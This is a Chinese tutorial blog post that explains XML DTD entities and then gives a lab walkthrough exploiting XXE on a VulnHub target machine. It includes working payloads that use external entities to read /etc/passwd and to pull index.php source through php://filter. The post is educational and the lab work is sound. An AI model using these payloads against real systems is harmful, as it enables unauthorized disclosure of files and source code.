XML与XXE

水深无声 2022-10-22 02:55 170阅读 0赞

# 关于xml格式 #

一个普通的xml

<?xml version="1.0"?>
    
    
    <!DOCTYPE note [
    
      <!ELEMENT note (to,from,heading,body)>
      <!ELEMENT to      (#PCDATA)>
      <!ELEMENT from    (#PCDATA)>
      <!ELEMENT heading (#PCDATA)>
      <!ELEMENT body    (#PCDATA)>
    ]>
    
    
    <note>
      <to>George</to>
      <from>John</from>
      <heading>Reminder</heading>
      <body>Don't forget the meeting!</body>
    </note>

DTD如果存在那么一定会被包裹在 DOCTYPE 声明中也就是中。

DTD就是文档类型定义，每个XML文档都可以有这个部分，用来定义XML文件中的元素、元素的属性、元素的排列方式、元素包含的内容等等。

简单点说就是DTD定义了元素的一部分属性或者显示方式等。这个DTD可以从外部获取也可以内部自己定义。

## XML文件引用DTD的方式 ##

1.  内部直接定义DTD

1.  引用外部DTD

<?xml version="1.0"?>
    
    
    <!DOCTYPE note SYSTEM "test.dtd">
    
    
    <note>
      <to>George</to>
      <from>John</from>
      <heading>Reminder</heading>
      <body>Don't forget the meeting!</body>
    </note>

下面文件为test.dtd

<!ELEMENT note (to,from,heading,body)>
      <!ELEMENT to      (#PCDATA)>
      <!ELEMENT from    (#PCDATA)>
      <!ELEMENT heading (#PCDATA)>
      <!ELEMENT body    (#PCDATA)>

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 1]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 2]

## DTD的结构 ##

DTD有三种类型，分别为ELEMENT、ENTITY、ATTLIST三种。

1.ELEMENT是用来定义元素中值的数据类型或者元素名等，举例如下：

<!ELEMENT note (to,from,heading,body)> #定义根元素为note的文档中有四个元素分别为to,from,heading,body。
    <!ELEMENT to      (#PCDATA)> #定义元素to的值为PCDATA类型。

2.ENTITY定义了一个值，在元素中可以引用这个值。

普通实体：

<?xml version="1.0"?>
    <!DOCTYPE note[
    <!ELEMENT note (name)>
    <!ENTITY hack3r "Hu3sky">
    ]>
    <note>
    <name>&hack3r;</name>
    </note>

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 3]

用&hack3r;即可调用之前设置的ENTITY。

参数实体：  
(1)使用 % 实体名(这里面空格不能少) 在 DTD 中定义，并且只能在 DTD 中使用 %实体名; 引用  
(2)只有在 DTD 文件中，参数实体的声明才能引用其他实体  
(3)和通用实体一样，参数实体也可以外部引用

<?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE xxe [
    <!ENTITY % test "<!ENTITY hacker 'qqwweerrr'>">//定义参数实体
    %test;//引用参数实体，引用后，值又被xml解析，则internal的值为http://darkerbox.com
    ]>
    
    <root>
    <test>[This is my site] &hacker;</test>
    </root>

`我测试的时候直接报错，原因未知。`

外部实体：

<?xml version="1.0" ?>
    <!DOCTYPE r [
    <!ELEMENT r ANY >
    <!ENTITY sp SYSTEM "file:///etc/passwd">
    ]>
    <root><name>&sp;</name><password>hj</password></root>

引用外部实体的时候可以走http，也可以走file等。

引用外部实体file:///etc/passwd，使用file协议读取了本地文件的内容，并赋值给sp，然后在xml文档中读取出来，例如下面的XXE漏洞演示。

3.ATTLIST  
设置属性的，跟XXE没啥关系。

# XXE漏洞复现 #

靶机下载地址：  
https://download.vulnhub.com/xxe/XXE.zip

刚开始先用nmap扫描探测：

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 4]

然后目录爆破，发现有robots.txt，访问后发现有xxe这个目录，访问后发现是登陆页面：  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 5]  
随便填写用户密码，抓包发现数据传输方式是xml，因此我们思考使用XXE漏洞攻击，上传恶意的xml数据：

原数据：  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 6]  
更改成恶意xml，读取/etc/passwd

<?xml version="1.0" ?>
    <!DOCTYPE r [
    <!ELEMENT r ANY >
    <!ENTITY sp SYSTEM "file:///etc/passwd">
    ]>
    <root><name>&sp;</name><password>hj</password></root>

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 7]  
我们猜测，登陆页面为index.php，使用php伪协议尝试读取index.php代码：

<?xml version="1.0" ?>
    <!DOCTYPE r [
    <!ELEMENT r ANY >
    <!ENTITY sp SYSTEM "php://filter/read=convert.base64-encode/resource=index.php">
    ]>
    <root><name>&sp;</name><password>hj</password></root>

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 8]  
将右侧的数据base64解密得到源码，部分源码如下：

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 9]

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 10]

# 补充：XMLHttpRequest对象 #

通过XMLHttpRequest可以实现：  
1.在不重新加载页面的情况下更新网页  
2.在页面已加载后从服务器请求数据  
3.在页面已加载后从服务器接收数据  
4.在后台向服务器发送数据

`这就是ajax技术。`

XMLHttpRequest 可以同步或异步请求web服务器上的资源，并且能够以文本或者一个 DOM 文档的形式返回内容，是实现ajax技术的核心。

XMLHttpRequest在进行http请求的时候有好几个状态也就是readyState属性，分别如下：  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 11]  
每更改一次状态，就要执行一次onreadystatechange函数。

XMLHttpRequest对象还有其他的属性：

<table> 
 <thead> 
  <tr> 
   <th>属性</th> 
   <th>作用</th> 
  </tr> 
 </thead> 
 <tbody> 
  <tr> 
   <td>responseText</td> 
   <td>请求后的响应数据(不包括http头)</td> 
  </tr> 
  <tr> 
   <td>responseXML</td> 
   <td>将响应转化为XML并作为Document对象返回</td> 
  </tr> 
  <tr> 
   <td>status</td> 
   <td>http状态码</td> 
  </tr> 
  <tr> 
   <td>statustext</td> 
   <td>http状态码的文字形式</td> 
  </tr> 
 </tbody> 
</table>

# 补充：XXE无回显利用 #

使用oob也就是带外攻击，让受害端把回显发送到我们指定的服务器上。  
[一篇文章带你深入理解漏洞之 XXE 漏洞][XXE]

# 参考文章 #

[XXE漏洞漏洞及利用方法解析][XXE 1]  
[xxe靶机漏洞复现][xxe]  
[XML DOM][]

[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70]: /images/20221022/a212e4a6f69f4191a60e2942debcc705.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 1]: /images/20221022/f2273fc7788e4b63b9bd6bc678ea43c0.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 2]: /images/20221022/60c9fa40966d41df9fa16b5e83d830c2.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 3]: /images/20221022/1c6cc74ff8964ac9a9260ea2fc661d2b.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 4]: /images/20221022/a88a60ead59445e09c7b450a1b681a6c.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 5]: /images/20221022/48e84b3cd3c24c1cac2d6a830376c13c.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 6]: /images/20221022/494535e2b241411782cefe278427f913.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 7]: /images/20221022/ae04257bf5d547a7bc98500f34eb1239.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 8]: /images/20221022/1848a14022d54c13b1576d73bf672378.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 9]: /images/20221022/85314cfcb00741c7a16011312bc64fdc.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 10]: /images/20221022/f4dd87f1914341ebb515b7bccf1d8165.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 11]: /images/20221022/19dc8ecca2fa470696a47288c899716a.png
[XXE]: https://xz.aliyun.com/t/3357#toc-8
[XXE 1]: https://blog.csdn.net/weixin_43749601/article/details/114014875
[xxe]: https://blog.csdn.net/qq_41901122/article/details/106335207
[XML DOM]: https://www.w3school.com.cn/xmldom/dom_http.asp